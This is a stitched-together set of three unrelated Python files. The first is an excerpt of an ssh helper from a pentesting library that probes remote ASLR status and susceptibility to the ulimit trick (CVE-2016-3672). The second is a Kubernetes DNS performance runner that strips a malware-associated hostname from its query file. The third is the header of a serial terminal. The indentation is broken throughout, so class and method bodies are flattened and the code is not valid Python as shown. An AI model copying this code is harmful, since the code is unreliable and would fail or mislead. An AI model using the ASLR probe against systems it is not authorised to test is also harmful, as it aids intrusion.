    session.interactive()
    session.close()
def set_working_directory(self, wd = None, symlink = False):
    """Sets the working directory in which future commands will
    be run (via ssh.run) and to which files will be uploaded/downloaded
    from if no path is provided

    Note:
        This uses ``mktemp -d`` under the covers, sets permissions
        on the directory to ``0700``.  This means that setuid binaries
        will **not** be able to access files created in this directory.

        In order to work around this, we also ``chmod +x`` the directory.

    Arguments:
        wd(string): Working directory.  Default is to auto-generate a directory
            based on the result of running 'mktemp -d' on the remote machine.
        symlink(bool,str): Create symlinks in the new directory.

            The default value, ``False``, implies that no symlinks should be
            created.

            A string value is treated as a path that should be symlinked.
            It is passed directly to the shell on the remote end for expansion,
            so wildcards work.

            Any other value is treated as a boolean, where ``True`` indicates
            that all files in the "old" working directory should be symlinked.

    Examples:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> cwd = s.set_working_directory()
        >>> s.ls()
        ''
        >>> s.pwd() == cwd
        True

        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> homedir = s.pwd()
        >>> _=s.touch('foo')

        >>> _=s.set_working_directory()
        >>> assert s.ls() == ''

        >>> _=s.set_working_directory(homedir)
        >>> assert 'foo' in s.ls().split()

        >>> _=s.set_working_directory(symlink=True)
        >>> assert 'foo' in s.ls().split()
        >>> assert homedir != s.pwd()

        >>> symlink=os.path.join(homedir,'*')
        >>> _=s.set_working_directory(symlink=symlink)
        >>> assert 'foo' in s.ls().split()
        >>> assert homedir != s.pwd()
    """
    status = 0

    # symlink=True (or any non-str truthy value) means "link everything
    # from the current working directory".
    if symlink and not isinstance(symlink, str):
        symlink = os.path.join(self.pwd(), '*')

    if not wd:
        # chmod +x works around the 0700 mode for setuid binaries (see Note).
        wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
        wd = wd.strip()

        if status:
            self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))

    else:
        # Sanity check: the caller-provided directory must exist.
        cmd = 'ls ' + sh_string(wd)
        _, status = self.run_to_end(cmd, wd = '.')

        if status:
            self.error("%r does not appear to exist" % wd)

    self.info("Working directory: %r" % wd)
    self.cwd = wd

    if symlink:
        self.ln('-s', symlink, '.')

    return self.cwd
def write(self, path, data):
    """Wrapper around upload_data to match :func:`pwnlib.util.misc.write`

    Arguments:
        path(str): Remote path to write to.
        data(str): Data to upload.
    """
    return self.upload_data(data, path)
def read(self, path):
    """Wrapper around download_data to match :func:`pwnlib.util.misc.read`

    Arguments:
        path(str): Remote path to read.

    Returns:
        The file contents as a string.
    """
    return self.download_data(path)
def _init_remote_platform_info(self):
    """Fills _platform_info, e.g.:

    ::

        {'distro': 'Ubuntu\n',
         'distro_ver': '14.04\n',
         'machine': 'x86_64',
         'node': 'pwnable.kr',
         'processor': 'x86_64',
         'release': '3.11.0-12-generic',
         'system': 'linux',
         'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}

    The first six fields come from running ``platform.uname()`` on the
    remote host; distro information is filled from ``lsb_release`` when
    available. Cached after the first call.
    """
    if self._platform_info:
        return

    def preexec():
        # Runs on the remote side: print one uname field per line.
        import platform
        print('\n'.join(platform.uname()))

    with context.quiet:
        with self.process('true', preexec_fn=preexec) as io:

            # Field order matches platform.uname(): system, node, release,
            # version, machine, processor.
            self._platform_info = {
                'system': io.recvline().lower().strip(),
                'node': io.recvline().lower().strip(),
                'release': io.recvline().lower().strip(),
                'version': io.recvline().lower().strip(),
                'machine': io.recvline().lower().strip(),
                'processor': io.recvline().lower().strip(),
                'distro': 'Unknown',
                'distro_ver': ''
            }

        try:
            if not self.which('lsb_release'):
                return

            # lsb_release -irs prints distributor ID then release, one per line.
            with self.process(['lsb_release', '-irs']) as io:
                self._platform_info.update({
                    'distro': io.recvline().strip(),
                    'distro_ver': io.recvline().strip()
                })
        except Exception:
            # Best-effort only; distro info stays at its defaults.
            pass
@property
def os(self):
    """:class:`str`: Operating System of the remote machine."""
    try:
        self._init_remote_platform_info()
        # Normalize through context so the name matches pwntools' os names.
        system = self._platform_info['system']
        with context.local(os=system):
            return context.os
    except Exception:
        return "Unknown"
@property
def arch(self):
    """:class:`str`: CPU Architecture of the remote machine."""
    try:
        self._init_remote_platform_info()
        # Normalize through context so the name matches pwntools' arch names.
        machine = self._platform_info['machine']
        with context.local(arch=machine):
            return context.arch
    except Exception:
        return "Unknown"
@property
def bits(self):
    """:class:`str`: Pointer size of the remote machine."""
    try:
        # Derive the pointer size from the remote architecture via a
        # scratch context, leaving the global context untouched.
        with context.local():
            context.clear()
            context.arch = self.arch
            return context.bits
    except Exception:
        # Fall back to whatever the local context currently says.
        return context.bits
@property
def version(self):
    """:class:`tuple`: Kernel version of the remote machine."""
    try:
        self._init_remote_platform_info()
        release = self._platform_info['release']

        # e.g. "3.11.0-12-generic" -> (3, 11, 0)
        match = re.search(r'([0-9]+\.?)+', release)
        numbers = match.group().split('.')
        return tuple(int(n) for n in numbers)
    except Exception:
        return (0,0,0)
@property
def distro(self):
    """:class:`tuple`: Linux distribution name and release."""
    try:
        self._init_remote_platform_info()
        info = self._platform_info
        return (info['distro'], info['distro_ver'])
    except Exception:
        return ("Unknown", "Unknown")
@property
def aslr(self):
    """:class:`bool`: Whether ASLR is enabled on the system.

    Determined by reading /proc/sys/kernel/randomize_va_space; cached
    after the first check. Only meaningful on Linux.

    Example:

        >>> s = ssh("travis", "example.pwnme")
        >>> s.aslr
        True
    """
    if self._aslr is None:
        if self.os != 'linux':
            self.warn_once("Only Linux is supported for ASLR checks.")
            self._aslr = False

        else:
            with context.quiet:
                rvs = self.read('/proc/sys/kernel/randomize_va_space')

            # randomize_va_space == 0 means ASLR is disabled.
            self._aslr = not rvs.startswith('0')

    return self._aslr
@property
def aslr_ulimit(self):
    """:class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit.

    Works by uploading a tiny 32-bit shellcode ELF that dumps its own
    /proc/self/maps, running it with an unlimited stack rlimit, and
    checking whether the mappings land at the fixed no-ASLR addresses.
    The result is cached.
    """
    import pwnlib.elf.elf
    import pwnlib.shellcraft

    if self._aslr_ulimit is not None:
        return self._aslr_ulimit

    # This test must run a 32-bit binary, fix the architecture
    arch = {
        'amd64': 'i386',
        'aarch64': 'arm'
    }.get(self.arch, self.arch)

    with context.local(arch=arch, bits=32, os=self.os, aslr=True):
        with context.quiet:
            try:
                # Build a tiny ELF that prints its own memory map and exits.
                sc = pwnlib.shellcraft.cat('/proc/self/maps') \
                   + pwnlib.shellcraft.exit(0)

                elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
            except Exception:
                self.warn_once("Can't determine ulimit ASLR status")
                self._aslr_ulimit = False
                return self._aslr_ulimit

    def preexec():
        # Runs on the remote side: lift the stack size limit, which on
        # vulnerable kernels disables mmap randomization for 32-bit.
        import resource
        try:
            resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
        except Exception:
            pass

    # Move to a new temporary directory
    cwd = self.cwd
    tmp = self.set_working_directory()

    try:
        self.upload(elf.path, './aslr-test')
    except IOError:
        self.warn_once("Couldn't check ASLR ulimit trick")
        self._aslr_ulimit = False
        return False

    self.process(['chmod', '+x', './aslr-test']).wait()
    maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()

    # Move back to the old directory
    self.cwd = cwd

    # Clean up the files
    self.process(['rm', '-rf', tmp]).wait()

    # Check for 555555000 (1/3 of the address space for PAE)
    # and for 40000000 (1/3 of the address space with 3BG barrier)
    # NOTE(review): the code matches '55555000' (8 digits) while the comment
    # above says 555555000 -- confirm which value is intended.
    self._aslr_ulimit = bool('55555000' in maps or '40000000' in maps)

    return self._aslr_ulimit
def _checksec_cache(self, value=None):
    """Read or write the cached checksec() output for this host/port.

    Arguments:
        value(str): When given, it is written to the cache file.
            When omitted, the cached contents are returned, or None
            if no cache entry exists yet.
    """
    path = self._get_cachefile('%s-%s' % (self.host, self.port))

    if value is not None:
        with open(path, 'w+') as f:
            f.write(value)
    else:
        # Bug fix: a missing cache file used to raise IOError, which made
        # checksec() crash on the first call for a given host. Treat a
        # missing file as a cache miss instead.
        try:
            with open(path, 'r+') as f:
                return f.read()
        except (IOError, OSError):
            return None
def checksec(self, banner=True):
    """checksec()

    Prints a helpful message about the remote system.

    The rendered report is cached per host/port via _checksec_cache.

    Arguments:
        banner(bool): Whether to print the path to the ELF binary.

    Returns:
        The report as a string.
    """
    cached = self._checksec_cache()
    if cached:
        return cached

    red    = text.red
    green  = text.green
    yellow = text.yellow

    res = [
        "%s@%s:" % (self.user, self.host),
        "Distro".ljust(10) + ' '.join(self.distro),
        "OS:".ljust(10) + self.os,
        "Arch:".ljust(10) + self.arch,
        "Version:".ljust(10) + '.'.join(map(str, self.version)),
        "ASLR:".ljust(10) + {
            True: green("Enabled"),
            False: red("Disabled")
        }[self.aslr]
    ]

    if self.aslr_ulimit:
        res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]

    cached = '\n'.join(res)
    self._checksec_cache(cached)

    return cached
|
runner.py | #!/usr/bin/env python3
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import logging
import os
import subprocess
import time
import traceback
import yaml
import threading
import re
import queue
from subprocess import PIPE
from data import Parser, ResultDb
from params import ATTRIBUTE_CLUSTER_DNS, ATTRIBUTE_NODELOCAL_DNS, Inputs, TestCases, QueryFile, RunLengthSeconds
_log = logging.getLogger(__name__)

# Label selector for the DNS perf server deployment/services.
_app_label = 'app=dns-perf-server'
# Pod name of the dnsperf client.
_client_podname = 'dns-perf-client'
# Label selector for the dummy test services created to inflate DNS state.
_test_svc_label = 'app=test-svc'
# Large query file used when --run-large-queries is set, and its source URL.
_dnsperf_qfile_name='queryfile-example-current'
_dnsperf_qfile_path='ftp://ftp.nominum.com/pub/nominum/dnsperf/data/queryfile-example-current.gz'
# Remove dns queries to this host since it is associated with behavior pattern
# of some malware
_remove_query_pattern=["setting3[.]yeahost[.]com"]

# Number of dummy test services to create.
MAX_TEST_SVC = 20
def add_prefix(prefix, text):
    """Prefix every line of *text* with *prefix*.

    Arguments:
        prefix (str): String prepended to each line.
        text (bytes or str): Multi-line payload; bytes are decoded first.

    Returns:
        str: The prefixed text.
    """
    # Bug fix: this used to call text.decode() unconditionally, which raised
    # AttributeError whenever a str (e.g. yaml.dump output) was passed in.
    if isinstance(text, bytes):
        text = text.decode()
    return '\n'.join(prefix + line for line in text.split('\n'))
class Runner(object):
"""
Runs the performance experiments.
"""
def __init__(self, args):
    """
    |args| parsed command line args.

    Loads the server/configmap/service/client/test-service manifests from
    the paths given in |args| and decides whether to use an existing DNS
    deployment (cluster DNS or node-local cache) or deploy a fresh server.
    """
    self.args = args
    # NOTE(review): yaml.load() without an explicit Loader is deprecated and
    # unsafe on untrusted input; these are operator-supplied manifests, but
    # yaml.safe_load would be preferable.
    self.deployment_yaml = yaml.load(open(self.args.deployment_yaml, 'r'))
    self.configmap_yaml = yaml.load(open(self.args.configmap_yaml, 'r')) if \
        self.args.configmap_yaml else None
    self.service_yaml = yaml.load(open(self.args.service_yaml, 'r')) if \
        self.args.service_yaml else None
    self.dnsperf_yaml = yaml.load(open(self.args.dnsperf_yaml, 'r'))
    self.test_params = TestCases.load_from_file(args.params)
    if self.args.run_large_queries:
        self.test_params.set_param(QueryFile().name, _dnsperf_qfile_name)
    self.args.testsvc_yaml = yaml.load(open(self.args.testsvc_yaml, 'r')) if \
        self.args.testsvc_yaml else None

    # Node the perf server gets pinned to; chosen later in _select_nodes().
    self.server_node = None
    # True when testing an already-running DNS service (no server deploy).
    self.use_existing = False
    self.db = ResultDb(self.args.db) if self.args.db else None

    self.attributes = set()
    if self.args.use_cluster_dns:
        _log.info('Using cluster DNS for tests')
        self.args.dns_ip = self._get_dns_ip(self.args.dns_server)
        self.attributes.add(ATTRIBUTE_CLUSTER_DNS)
        self.use_existing = True
    elif self.args.nodecache_ip:
        _log.info('Using existing node-local-dns for tests')
        self.args.dns_ip = self.args.nodecache_ip
        self.attributes.add(ATTRIBUTE_NODELOCAL_DNS)
        self.use_existing = True
    _log.info('DNS service IP is %s', args.dns_ip)
def go(self):
    """
    Run the performance tests.

    Generates the test cases, (re)deploys the DNS server only when its
    parameters change between cases, fans each case out to every client
    pod in parallel, and always tears down server and client at the end.
    Returns 0.
    """
    self._select_nodes()
    test_cases = self.test_params.generate(self.attributes)
    if len(test_cases) == 0:
        _log.warning('No test cases')
        return 0

    try:
        self._ensure_out_dir(test_cases[0].run_id)
        client_pods=self._reset_client()
        _log.info('Starting creation of test services')
        self._create_test_services()
        last_deploy_yaml = None
        last_config_yaml = None

        for test_case in test_cases:
            try:
                inputs = Inputs(self.deployment_yaml, self.configmap_yaml,
                                ['/dnsperf', '-s', self.args.dns_ip])
                test_case.configure(inputs)
                # pin server to a specific node
                inputs.deployment_yaml['spec']['template']['spec']['nodeName'] = \
                    self.server_node
                # Redeploy only when the rendered manifests changed since
                # the previous test case (and we own the server at all).
                if not self.use_existing and (
                        yaml.dump(inputs.deployment_yaml) !=
                        yaml.dump(last_deploy_yaml) or
                        yaml.dump(inputs.configmap_yaml) !=
                        yaml.dump(last_config_yaml)):
                    _log.info('Creating server with new parameters')
                    self._teardown()
                    self._create(inputs.deployment_yaml)
                    self._create(self.service_yaml)
                    if self.configmap_yaml is not None:
                        self._create(self.configmap_yaml)
                    self._wait_for_status(True)
                test_threads=[]
                #Spawn off a thread to run the test case in each client pod simultaneously.
                for podname in client_pods:
                    _log.debug('Running test in pod %s', podname)
                    tc = copy.copy(test_case)
                    tc.pod_name = podname
                    dt = threading.Thread(target=self._run_perf,args=[tc,inputs, podname])
                    test_threads.append(dt)
                    dt.start()
                for thread in test_threads:
                    thread.join()
                last_deploy_yaml = inputs.deployment_yaml
                last_config_yaml = inputs.configmap_yaml
            except Exception:
                _log.info('Exception caught during run, cleaning up. %s',
                          traceback.format_exc())
                self._teardown()
                self._teardown_client()
                raise
    finally:
        self._teardown()
        self._teardown_client()
        if self.db is not None:
            self.db.commit()
    return 0
def _kubectl(self, stdin, *args):
    """Run kubectl with |args|, optionally feeding |stdin| to the process.

    |return| (return_code, stdout, stderr) -- stdout/stderr are bytes.
    """
    cmdline = [self.args.kubectl_exec] + list(args)
    _log.debug('kubectl %s', cmdline)
    if stdin:
        _log.debug('kubectl stdin\n%s', add_prefix('in | ', stdin))
    # Bug fix: Popen pipes are binary; encode str payloads (e.g. yaml.dump
    # output from _create) before passing them to communicate().
    if isinstance(stdin, str):
        stdin = stdin.encode()
    proc = subprocess.Popen(cmdline, stdin=PIPE, stdout=PIPE, stderr=PIPE)
    out, err = proc.communicate(stdin)
    ret = proc.wait()

    _log.debug('kubectl ret=%d', ret)
    _log.debug('kubectl stdout\n%s', add_prefix('out | ', out))
    _log.debug('kubectl stderr\n%s', add_prefix('err | ', err))

    # Bug fix: return the already-collected exit code instead of calling
    # proc.wait() a second time.
    return ret, out, err
def _create(self, yaml_obj):
    """Create a Kubernetes resource by piping |yaml_obj| to `kubectl create`.

    Raises Exception if kubectl exits non-zero.
    """
    _log.debug('applying yaml: %s', yaml.dump(yaml_obj))
    ret, out, err = self._kubectl(yaml.dump(yaml_obj), 'create', '-f', '-')
    if ret != 0:
        _log.error('Could not create dns: %d\nstdout:\n%s\nstderr:%s\n',
                   ret, out, err)
        raise Exception('create failed')
    _log.info('Create %s/%s ok', yaml_obj['kind'], yaml_obj['metadata']['name'])
def _run_top(self, output_q):
    """Sample `kubectl top pod` for the duration of the test run.

    Polls every 2 seconds for RunLengthSeconds, tracking the maximum CPU
    (millicores) and memory (Mi) seen for the perf server and kube-dns
    pods. Pushes four integers onto |output_q| in order:
    perf-server cpu, perf-server memory, kube-dns cpu, kube-dns memory.
    """
    kubedns_top_args = ['-l', 'k8s-app=kube-dns', '-n', 'kube-system']
    if self.args.nodecache_ip:
        perfserver_top_args = ['-l', 'k8s-app=node-local-dns', '-n', 'kube-system']
    else:
        perfserver_top_args = ['-l', _app_label]
    run_time = int(self.test_params.get_param(RunLengthSeconds().name)[0])
    t_end = time.time() + run_time

    # Bug fix: these maxima used to be re-initialized on every loop
    # iteration, so only the final sample was ever reported. Track them
    # across the whole sampling window instead.
    max_perfserver_cpu = 0
    max_perfserver_mem = 0
    max_kubedns_cpu = 0
    max_kubedns_mem = 0

    while time.time() < t_end:
        _, perfout, _ = self._kubectl(*([None, 'top', 'pod'] + perfserver_top_args))
        _, kubeout, _ = self._kubectl(*([None, 'top', 'pod'] + kubedns_top_args))
        # Bug fix: _kubectl returns bytes; decode before applying str regexes.
        if isinstance(perfout, bytes):
            perfout = perfout.decode()
        if isinstance(kubeout, bytes):
            kubeout = kubeout.decode()
        # Output is of the form:
        # NAME                      CPU(cores) MEMORY(bytes)
        # kube-dns-686548bc64-4q7wg 2m         31Mi
        for v in re.findall(r' (\d+)m ', perfout):
            max_perfserver_cpu = max(max_perfserver_cpu, int(v))
        for v in re.findall(r' (\d+)Mi ', perfout):
            max_perfserver_mem = max(max_perfserver_mem, int(v))
        for v in re.findall(r' (\d+)m ', kubeout):
            max_kubedns_cpu = max(max_kubedns_cpu, int(v))
        for v in re.findall(r' (\d+)Mi ', kubeout):
            max_kubedns_mem = max(max_kubedns_mem, int(v))
        time.sleep(2)

    output_q.put(max_perfserver_cpu)
    output_q.put(max_perfserver_mem)
    output_q.put(max_kubedns_cpu)
    output_q.put(max_kubedns_mem)
def _run_perf(self, test_case, inputs, podname):
    """Run one dnsperf test case inside |podname| and record the results.

    Raw dnsperf output goes to ``result-...out.raw``; parsed YAML results
    (including resource maxima collected by a parallel _run_top thread)
    go to ``result-...out`` and, when configured, into the result DB.
    """
    _log.info('Running test case: %s', test_case)
    output_file = '%s/run-%s/result-%s-%s.out' % \
        (self.args.out_dir, test_case.run_id, test_case.run_subid, test_case.pod_name)
    _log.info('Writing to output file %s', output_file)
    res_usage = queue.Queue()
    # Sample resource usage concurrently while dnsperf runs.
    dt = threading.Thread(target=self._run_top,args=[res_usage])
    dt.start()

    header = '''### run_id {run_id}:{run_subid}
### date {now}
### settings {test_case}
'''.format(run_id=test_case.run_id,
           run_subid=test_case.run_subid,
           now=time.ctime(),
           test_case=json.dumps(test_case.to_yaml()))

    with open(output_file + '.raw', 'w') as fh:
        fh.write(header)
        cmdline = inputs.dnsperf_cmdline
        code, out, err = self._kubectl(
            *([None, 'exec', podname, '--'] + [str(x) for x in cmdline]))
        fh.write('%s\n' % add_prefix('out | ', out))
        fh.write('%s\n' % add_prefix('err | ', err))

        if code != 0:
            # NOTE(review): the message and args are passed as a tuple and
            # never %-formatted; the exception text shows the raw tuple.
            raise Exception('error running dnsperf - %s, podname %s', err, podname)
    dt.join()
    with open(output_file, 'w') as fh:
        results = {}
        results['params'] = test_case.to_yaml()
        results['code'] = code
        results['stdout'] = out.decode().split('\n')
        results['stderr'] = err.decode().split('\n')
        results['data'] = {}

        try:
            parser = Parser(out)
            parser.parse()
            _log.info('Test results parsed')
            results['data']['ok'] = True
            results['data']['msg'] = None
            for key, value in list(parser.results.items()):
                results['data'][key] = value
            # _run_top queues exactly four values in this order.
            results['data']['max_perfserver_cpu'] = res_usage.get()
            results['data']['max_perfserver_memory'] = res_usage.get()
            results['data']['max_kubedns_cpu'] = res_usage.get()
            results['data']['max_kubedns_memory'] = res_usage.get()
            results['data']['histogram'] = parser.histogram
        except Exception as exc:
            _log.error('Error parsing results: %s', exc)
            results['data']['ok'] = False
            results['data']['msg'] = 'parsing error:\n%s' % traceback.format_exc()

        fh.write(yaml.dump(results))
        if self.db is not None and results['data']['ok']:
            self.db.put(results)
def _create_test_services(self):
    """Create MAX_TEST_SVC dummy services (test-svc1..N) to pad DNS state."""
    if not self.args.testsvc_yaml:
        _log.info("Not creating test services since no yaml was provided")
        return
    # Clear out any services left over from a previous run first.
    self._kubectl(None, 'delete', 'services', '-l', _test_svc_label)
    for svc_index in range(1, MAX_TEST_SVC + 1):
        self.args.testsvc_yaml['metadata']['name'] = "test-svc" + str(svc_index)
        self._create(self.args.testsvc_yaml)
def _select_nodes(self):
    """Pick the node the perf server will be pinned to.

    Honors --server-node when given; otherwise uses the first schedulable
    node. No-op (beyond validation) when testing an existing DNS service.
    Raises Exception when fewer than 2 schedulable nodes exist (unless
    --single-node) or when the requested node is invalid.
    """
    code, out, _ = self._kubectl(None, 'get', 'nodes', '-o', 'yaml')
    if code != 0:
        # Bug fix: the message was passed as a tuple and never %-formatted.
        raise Exception('error getting nodes: %d' % code)
    # Filter out cordoned/unschedulable nodes.
    nodes = [n['metadata']['name'] for n in yaml.load(out)['items']
             if not ('unschedulable' in n['spec'] \
                     and n['spec']['unschedulable'])]
    if len(nodes) < 2 and not self.args.single_node:
        raise Exception('you need 2 or more worker nodes to run the perf test')

    if self.use_existing:
        return

    if self.args.server_node:
        if self.args.server_node not in nodes:
            raise Exception('%s is not a valid node' % self.args.server_node)
        _log.info('Manually selected server_node')
        self.server_node = self.args.server_node
    else:
        self.server_node = nodes[0]
    _log.info('Server node is %s', self.server_node)
def _get_dns_ip(self, svcname):
    """Return the cluster IP of service |svcname| in kube-system.

    Raises Exception if kubectl fails or the service YAML lacks a
    spec.clusterIP field.
    """
    code, out, _ = self._kubectl(None, 'get', 'svc', '-o', 'yaml',
                                 svcname, '-nkube-system')
    if code != 0:
        raise Exception('error getting dns ip for service %s: %d' %(svcname, code))
    try:
        return yaml.load(out)['spec']['clusterIP']
    except Exception:
        # Bug fix: narrowed from a bare `except:`, which also swallowed
        # SystemExit and KeyboardInterrupt.
        raise Exception('error parsing %s service, could not get dns ip' %(svcname))
def _teardown(self):
    """Delete the perf server resources and test services; best-effort."""
    _log.info('Starting server teardown')

    self._kubectl(None, 'delete', 'deployments', '-l', _app_label)
    self._kubectl(None, 'delete', 'services', '-l', _app_label)
    self._kubectl(None, 'delete', 'configmap', '-l', _app_label)
    # Block until no server pods remain.
    self._wait_for_status(False)

    _log.info('Server teardown ok')
    self._kubectl(None, 'delete', 'services', '-l', _test_svc_label)
    if self.args.run_large_queries:
        try:
            # NOTE(review): plain string concatenation assumes query_dir
            # ends with a path separator -- verify against arg parsing.
            subprocess.check_call(['rm', self.args.query_dir +_dnsperf_qfile_name])
        except subprocess.CalledProcessError:
            _log.info("Failed to delete query file")
def _reset_client(self):
    """Recreate the dnsperf client deployment and wait until it is usable.

    Returns:
        list of client pod names, each verified to accept `kubectl exec`
        and seeded with the query files.
    """
    self._teardown_client()
    self._create(self.dnsperf_yaml)
    client_pods=[]
    while True:
        code, pending, err = self._kubectl(None, 'get','deploy', 'dns-perf-client','--no-headers', '-o', 'custom-columns=:status.unavailableReplicas')
        # Bug fix: kubectl output is bytes; comparing it to the str
        # "<none>" never matched, so this loop could never terminate.
        if isinstance(pending, bytes):
            pending = pending.decode()
        if pending.rstrip() != "<none>":
            #Deployment not ready yet
            _log.info("pending replicas in client deployment - '%s'", pending.rstrip())
            time.sleep(5)
            continue
        code, client_pods, err = self._kubectl(None, 'get','pods', '-l', 'app=dns-perf-client', '--no-headers', '-o', 'custom-columns=:metadata.name')
        if code != 0:
            _log.error('Error: stderr\n%s', add_prefix('err | ', err))
            raise Exception('error getting pod information: %d', code)
        client_pods=client_pods.rstrip().decode().split('\n')
        _log.info('got client pods "%s"', client_pods)
        if len(client_pods) > 0:
            break
        _log.debug('waiting for client pods')

    for podname in client_pods:
        # Wait until each pod accepts exec before using it.
        while True:
            code, _, _ = self._kubectl(
                None, 'exec', '-i', podname, '--', 'echo')
            if code == 0:
                break
            time.sleep(1)
            _log.info('Client pod ready for execution')
        self._copy_query_files(podname)
    return client_pods
def _copy_query_files(self, podname):
    """Copy the dnsperf query files into client pod |podname|.

    When --run-large-queries is set, first downloads and sanitizes the
    large public query file into the local query directory.
    """
    if self.args.run_large_queries:
        try:
            _log.info('Downloading large query file')
            subprocess.check_call(['wget', _dnsperf_qfile_path])
            # Bug fix: _dnsperf_qfile_path is already a str; calling
            # .decode() on it raised AttributeError.
            subprocess.check_call(['gunzip', _dnsperf_qfile_path.split('/')[-1]])
            _log.info('Removing hostnames matching specified patterns')
            for pattern in _remove_query_pattern:
                subprocess.check_call(['sed', '-i', '-e', '/%s/d' %(pattern), _dnsperf_qfile_name])
            subprocess.check_call(['mv', _dnsperf_qfile_name, self.args.query_dir])
        except subprocess.CalledProcessError:
            _log.info('Exception caught when downloading query files %s',
                      traceback.format_exc())

    _log.info('Copying query files to client %s', podname)
    # Stream the query directory as a tar through kubectl exec.
    tarfile_contents = subprocess.check_output(
        ['tar', '-czf', '-', self.args.query_dir])
    code, _, _ = self._kubectl(
        tarfile_contents,
        'exec', '-i', podname, '--', 'tar', '-xzf', '-')
    if code != 0:
        raise Exception('error copying query files to client: %d' % code)
    _log.info('Query files copied')
def _teardown_client(self):
    """Delete the client deployment and block until its pod is gone."""
    _log.info('Starting client teardown')
    self._kubectl(None, 'delete', 'deployment/dns-perf-client')
    # `kubectl get pod` exits 0 while the pod still exists.
    while self._kubectl(None, 'get', 'pod', _client_podname)[0] == 0:
        time.sleep(1)
        _log.info('Waiting for client pod to terminate')
    _log.info('Client teardown complete')
def _wait_for_status(self, active):
    """Block until the DNS server pods are up (active=True) or gone (False).

    Polls `kubectl get pods` once per second.  When waiting for the
    service to come up, additionally waits until a `dig` against
    self.args.dns_ip succeeds from inside the client pod.

    Raises:
        Exception: if pod information cannot be retrieved.
    """
    while True:
        code, out, err = self._kubectl(
            None, 'get', '-o', 'yaml', 'pods', '-l', _app_label)
        if code != 0:
            _log.error('Error: stderr\n%s', add_prefix('err | ', err))
            # Bug fix: %-format the code into the message instead of
            # passing it as a stray exception argument.
            raise Exception('error getting pod information: %d' % code)
        # safe_load: kubectl output is plain data; plain yaml.load would
        # allow arbitrary Python object construction.
        pods = yaml.safe_load(out)
        _log.info('Waiting for server to be %s (%d pods active)',
                  'up' if active else 'deleted',
                  len(pods['items']))
        if (active and len(pods['items']) > 0) or \
           (not active and len(pods['items']) == 0):
            break
        time.sleep(1)
    if active:
        # Pods exist, but the DNS service itself may not answer yet.
        while True:
            code, out, err = self._kubectl(
                None,
                'exec', _client_podname, '--',
                'dig', '@' + self.args.dns_ip,
                'kubernetes.default.svc.cluster.local.')
            if code == 0:
                break
            _log.info('Waiting for DNS service to start')
            time.sleep(1)
        _log.info('DNS is up')
def _ensure_out_dir(self, run_id):
    """Create the per-run output directory and repoint the 'latest' symlink.

    Creates <out_dir>/run-<run_id> if needed and makes <out_dir>/latest
    a relative symlink pointing at it.
    """
    rundir_name = 'run-%s' % run_id
    rundir = os.path.join(self.args.out_dir, rundir_name)
    latest = os.path.join(self.args.out_dir, 'latest')
    if not os.path.exists(rundir):
        os.makedirs(rundir)
        _log.info('Created rundir %s', rundir)
    # lexists, not exists: exists() follows symlinks, so a dangling
    # 'latest' link would not be removed and os.symlink below would
    # raise EEXIST.
    if os.path.lexists(latest):
        os.unlink(latest)
    os.symlink(rundir_name, latest)
    _log.info('Updated symlink %s', latest)
|
miniterm.py | #!/usr/bin/python
# Very simple serial terminal
# (C)2002-2011 Chris Liechti <cliechti@gmx.net>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped trough pythons
# repr, useful for debug purposes)
import sys, os, serial, threading
try:
from serial.tools.list_ports import comports
except ImportError:
comports = None
EXITCHARCTER = serial.to_bytes([0x1d]) # GS/CTRL+]
MENUCHARACTER = serial.to_bytes([0x14]) # Menu: CTRL+T
DEFAULT_PORT = None
DEFAULT_BAUDRATE = 9600
DEFAULT_RTS = None
DEFAULT_DTR = None
def key_description(character):
    """Return a human readable name for *character*, e.g. 'Ctrl+A'."""
    code = ord(character)
    if code >= 32:
        # printable: fall back to Python's repr
        return repr(character)
    # control characters map onto '@', 'A', 'B', ...
    return 'Ctrl+%c' % (ord('@') + code)
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys is used and not the value at program start
def get_help_text():
    """Return the menu help screen rendered with the current key bindings."""
    return """
--- pySerial (%(version)s) - miniterm - help
---
--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
---    %(itself)-7s Send the menu character itself to remote
---    %(exchar)-7s Send the exit character itself to remote
---    %(info)-7s Show info
---    %(upload)-7s Upload file (prompt will be shown)
--- Toggles:
---    %(rts)-7s RTS          %(echo)-7s local echo
---    %(dtr)-7s DTR          %(break)-7s BREAK
---    %(lfm)-7s line feed    %(repr)-7s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- p          change port
--- 7 8        set data bits
--- n e o s m  change parity (None, Even, Odd, Space, Mark)
--- 1 2 3      set stop bits (1, 2, 1.5)
--- b          change baud rate
--- x X        disable/enable software flow control
--- r R        disable/enable hardware flow control
""" % {
        # key_description() is evaluated here so a runtime change of the
        # EXITCHARCTER/MENUCHARACTER globals is reflected in the help.
        'version': getattr(serial, 'VERSION', 'unknown version'),
        'exit': key_description(EXITCHARCTER),
        'menu': key_description(MENUCHARACTER),
        'rts': key_description('\x12'),
        'repr': key_description('\x01'),
        'dtr': key_description('\x04'),
        'lfm': key_description('\x0c'),
        'break': key_description('\x02'),
        'echo': key_description('\x05'),
        'info': key_description('\x09'),
        'upload': key_description('\x15'),
        'itself': key_description(MENUCHARACTER),
        'exchar': key_description(EXITCHARCTER),
    }
